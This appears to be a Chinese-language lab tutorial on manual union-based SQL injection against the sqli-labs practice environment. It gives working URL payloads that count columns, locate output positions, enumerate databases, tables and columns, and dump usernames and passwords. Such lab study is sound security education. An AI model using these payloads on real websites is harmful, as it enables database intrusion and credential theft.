一、SQL注入原理与危害
原理: 由于用户不可控输入,攻击者可以任意的输入网易的SQL语句,从而对数据库产生风险。
危害:
数据操作
文件操作
命令操作
绕过登录
二、联合查询注入
联合查询的核心: union
union:两个查询语句列数相同
三、联合查询手工注入流程
判断列数--
N=m页面正常,但N=m+1页面异常,原始查询由m列
http://192.168.30.1/sqli-labs-master/sqli-labs-master/Less-1/?id=1' order by N--+
判断回显位置
。 原始查询为空----》
http://192.168.30.1/sqli-labs-master/sqli-labs-master/Less-1/?id=-1' union select 1,2,3--+
查询数据
○ 查询数据库用户
http://192.168.30.1/sqli-labs-master/sqli-labs-master/Less-1/?id=-1' union select 1,2,user()--+
○ 查询当前数据库名
http://192.168.30.1/sqli-labs-master/sqli-labs-master/Less-1/?id=-1' union select 1,2,database()--+
○ 查询所有数据库
http://192.168.30.1/sqli-labs-master/sqli-labs-master/Less-1/?id=-1' union select 1,2,group_concat(schema_name) from information_schema.schemata--+
○ 查询指定库的表
http://192.168.30.1/sqli-labs-master/sqli-labs-master/Less-1/?id=-1' union select 1,2,group_concat(table_name) from information_schema.tables where
table_schema="security"--+
○ 读取列名
读取列名
http://192.168.30.1/sqli-labs-master/sqli-labs-master/Less-1/?id=-1' union select 1,2,group_concat(column_name) from information_schema.columns where
table_schema="security" and table_name="users"--+
○ 获取数据
http://192.168.30.1/sqli-labs-master/sqli-labs-master/Less-1/?id=-1' union select 1,2,group_concat(id,username,password) from users--+
11-18
972
08-10
3602
05-23
405
05-11
3870